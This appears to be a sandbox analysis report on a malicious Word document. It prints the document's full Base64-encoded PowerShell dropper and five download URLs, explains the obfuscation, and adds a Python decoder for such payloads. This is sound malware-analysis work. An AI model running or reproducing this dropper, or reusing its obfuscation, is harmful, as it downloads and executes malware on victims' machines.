Analysis

  • max time kernel
    30s
  • resource
    win10v191014
  • submitted
    28-01-2020 14:36

General

  • Target

    e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc

  • Sample

    200128-asd9ynh2e2

  • SHA256

    e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4

Score
10/10

Malware Config

Extracted

  • Language: ps1
  • Source: exe.dropper
  • URLs:
    http://zethler.com/cgi-bin/8k1/
    http://emmaurlogisticsltd.com/wp-content/wm/
    https://www.rimayaswimwear.com/msxnoa/dx8frn/
    https://aredsm.com/l4jn4/ol11/
    https://fashionlifestyle.net/tmp/d7so/

Signatures

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Process spawned unexpected child process (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e849501d3e7272570fb9d8adc773b76260eecd17d2ea57f233110401a9fc17b4.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4888
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABFAGYAagBsAGcAdQByAGUAcQBkAGkAPQAnAFcAaQBqAG4AdQByAGcAawB2AGUAbgBoAGQAJwA7ACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AIAA9ACAAJwAyADIANQAnADsAJABIAGsAcQB3AGQAYwBhAGcAaABsAHIAYgB0AD0AJwBGAHcAaABmAG4AZwBzAHgAdgBzACcAOwAkAEQAdgB0AGgAZwBxAHQAcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAHEAbwBiAGUAYgB3AHAAZwByAG4AKwAnAC4AZQB4AGUAJwA7ACQAQgB3AGQAZABwAHgAZgBqAHQAcgA9ACcAVABpAGQAZwBpAHoAZQByAGYAcwBoAGwAJwA7ACQATABwAG4AZQByAHoAeABmAGEAPQAuACgAJwBuACcAKwAnAGUAJwArACcAdwAtAG8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AVwBlAEIAQwBsAEkARQBuAFQAOwAkAFAAYwBpAHQAZQBmAG0AYQBxAGQAcAB6AD0AJwBoAHQAdABwADoALwAvAHoAZQB0AGgAbABlAHIALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwA4AGsAMQAvACoAaAB0AHQAcAA6AC8ALwBlAG0AbQBhAHUAcgBsAG8AZwBpAHMAdABpAGMAcwBsAHQAZAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHcAbQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AcgBpAG0AYQB5AGEAcwB3AGkAbQB3AGUAYQByAC4AYwBvAG0ALwBtAHMAeABuAG8AYQAvAGQAeAA4AGYAcgBuAC8AKgBoAHQAdABwAHMAOgAvAC8AYQByAGUAZABzAG0ALgBjAG8AbQAvAGwANABqAG4ANAAvAG8AbAAxADEALwAqAGgAdAB0AHAAcwA6AC8ALwBmAGEAcwBoAGkAbwBuAGwAaQBmAGUAcwB0AHkAbABlAC4AbgBlAHQALwB0AG0AcAAvAGQANwBzAG8ALwAnAC4AIgBTAFAAbABgAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAcwBwAG0AdQBkAHkAdAA9ACcARABpAGMAZABuAGcAcwBvAG4AbwAnADsAZgBvAHIAZQBhAGMAaAAoACQARABhAGkAYgB1AGIAagBpAGgAcQBwACAAaQBuACAAJABQAGMAaQB0AGUAZgBtAGEAcQBkAHAAegApAHsAdAByAHkAewAkAEwAcABuAGUAcgB6AHgAZgBhAC4AIgBkAG8AdwBgAE4ATABvAGAAQQBEAGYAYABJAGwARQAiACgAJABEAGEAaQBiAHUAYgBqAGkAaABxAHAALAAgACQARAB2AHQAaABnAHEAdABzACkAOwAkAEQAbABvAHcAbwBvAGQAagBwAD0AJwBQAHIAbQB0AGgAdwBmAHYAegAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEQAdgB0AGgAZwBxAHQAcwApAC4AIgBsAGAARQBgAE4AZwBUAGgAIgAgAC0AZwBlACAAMgA2ADYAMgA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAEQAdgB0AGgAZwBxAHQAcwApADsAJABaAHcAYQBkAHoAegBzAHgAPQAnAEIAcABkAHgAeQBwAGoAcQBxAHUAawAnADsAYgByAGUAYQBrADsAJABNAGIAbQBsAHIAaQB0AG0AdwBqAGgAPQAnAE4AbABkAGoAdwB2AHgAYQBwAHcAcQBqAHkAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASgBzAHoAcwB3AGoAbgBjAG4AbwA9ACcAUABiAGUAZwB2AGkAeQBiAHkAbQBoACcA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious behavior: EnumeratesProcesses
    PID:4476

    -w hidden is -WindowStyle Hidden and -en is an abbreviation of -EncodedCommand (powershell.exe accepts any unambiguous prefix of a parameter name), so the argument is the Base64 encoding of a UTF-16LE script. Decoded, it is the ps1 dropper whose configuration is listed under Malware Config: the five URLs are stored as one string joined by '*' and split with [char]42; the script tries each in turn with New-Object Net.WebClient DownloadFile into $env:userprofile\225.exe, and if Get-Item reports the file as at least 26627 bytes (a check that a real payload rather than an error page was served) it starts it with [Diagnostics.Process]::Start and breaks out of the loop; every error is swallowed by try/catch, so a dead URL simply falls through to the next one. Cmdlet and method names are broken up with string concatenation ('n'+'e'+'w-objec'+'t', 'Ge'+'t-It'+'em') and backticks before letters that are not escape characters ("dow`NLo`ADf`IlE", "s`TarT") to defeat naive string matching; the padding variables assigned to random-looking names are never used. "Process spawned unexpected child process" is flagged here because PowerShell was not started by a normal interactive parent; the only other process recorded in the run is the WINWORD.EXE instance (PID 4888) that opened the document.
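The report's Malware Config and the PowerShell command line above are two ends of the same workflow: take the -en blob off the process command line, decode it, and pull the URL list and the other tells out of the script. The following Python is an added example of that workflow and is not part of the sandbox report or its tooling. SAMPLE_SCRIPT is a constructed stand-in that copies the structure of the decoded payload (a single-quoted URL list split with [char]42, backtick-broken member names, a Get-Item length check) with placeholder domains rather than the report's indicators; function names such as decode_command, strip_backticks and summarize are this example's own.

```python
"""Decode a PowerShell -EncodedCommand argument and summarise a '*'-joined
URL-list downloader of the kind this report extracts its config from.

Added example, not part of the sandbox report. SAMPLE_SCRIPT is constructed:
it mirrors the layout of the report's decoded payload but uses placeholder
domains, not the report's indicators.
"""
import base64
import re

# Constructed sample (placeholder domains) mirroring the report's payload layout.
SAMPLE_SCRIPT = (
    "$Path=$env:userprofile+'\\'+'225'+'.exe';"
    "$Client=.('n'+'e'+'w-objec'+'t') nET.WeBClIEnT;"
    "$Urls='http://example.invalid/a/*https://example.test/b/c/*"
    "http://example.invalid/d/'.\"SPl`IT\"([char]42);"
    "foreach($u in $Urls){try{$Client.\"dow`NLo`ADf`IlE\"($u, $Path);"
    "If ((&('Ge'+'t-It'+'em') $Path).\"l`E`NgTh\" -ge 26627) "
    "{[Diagnostics.Process]::\"s`TarT\"($Path);break}}catch{}}"
)


def encode_command(script):
    """What powershell.exe expects after -EncodedCommand: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def extract_encoded_arg(cmdline):
    """Pull the Base64 blob out of a full command line. powershell.exe accepts any
    unambiguous prefix of -EncodedCommand, so -e, -ec, -en and -enc all occur.
    Whitespace inside the blob (a line break in a report) is tolerated and removed."""
    m = re.search(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=\s]+)", cmdline, re.I)
    if not m:
        return None
    return re.sub(r"\s+", "", m.group(1))


def decode_command(arg):
    """Inverse of encode_command. Strips whitespace and restores '=' padding that
    log pipelines and report renderers often drop before decoding."""
    cleaned = re.sub(r"\s+", "", arg)
    cleaned += "=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned).decode("utf-16le")


def strip_backticks(script):
    """Inside double quotes PowerShell discards a backtick that precedes a character
    with no escape meaning, so "dow`NLo`ADf`IlE" is DownloadFile. The real escapes
    are lowercase (`0 `a `b `e `f `n `r `t `u `v) and are kept; all other backticks go."""
    return re.sub(r"`(?![0abefnrtuv])", "", script)


def summarize(script):
    """Return the downloader's URL list, size threshold and quoted member names."""
    deob = strip_backticks(script)
    # The separator is given as a character code: ."split"([char]42) -> '*'.
    sep_match = re.search(r'\.\s*"?split"?\s*\(\s*\[char\]\s*(\d+)\s*\)', deob, re.I)
    sep = chr(int(sep_match.group(1))) if sep_match else None
    urls = []
    # Single-quoted literals that contain a URL are the joined list; split them.
    for literal in re.findall(r"'([^']*https?://[^']*)'", deob):
        parts = literal.split(sep) if sep else [literal]
        urls.extend(p.strip() for p in parts if p.strip())
    if not urls:  # no joined literal found: fall back to scanning for bare URLs
        urls = re.findall(r"https?://[^\s'\"]+", deob)
    size = re.search(r'length"?\s+-ge\s+(\d+)', deob, re.I)
    # Member names written as quoted strings (."Foo" / ::"Foo") are themselves a
    # tell; lower-casing them yields the real API names to hunt for.
    members = [m.lower() for m in re.findall(r'(?:\.|::)"([A-Za-z]+)"', deob)]
    return {
        "separator": sep,
        "urls": urls,
        "min_size": int(size.group(1)) if size else None,
        "quoted_members": members,
    }


def analyze_cmdline(cmdline):
    """End to end: command line -> Base64 blob -> script -> summary (None if no -e* arg)."""
    arg = extract_encoded_arg(cmdline)
    if arg is None:
        return None
    return summarize(decode_command(arg))


if __name__ == "__main__":
    blob = encode_command(SAMPLE_SCRIPT)
    # Break the blob across two lines the way the report renders it.
    cmdline = "Powershell -w hidden -en " + blob[:60] + "\n" + blob[60:]
    print(analyze_cmdline(cmdline))
```

On the report's own command line the same steps yield the five URLs listed under Malware Config, the 26627-byte threshold and the downloadfile/start members. The backtick rule matters: a naive `.replace("`", "")` would also destroy genuine `n and `t escapes in a script that uses them, so only backticks before non-escape characters are removed.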

Network

MITRE ATT&CK Enterprise v6
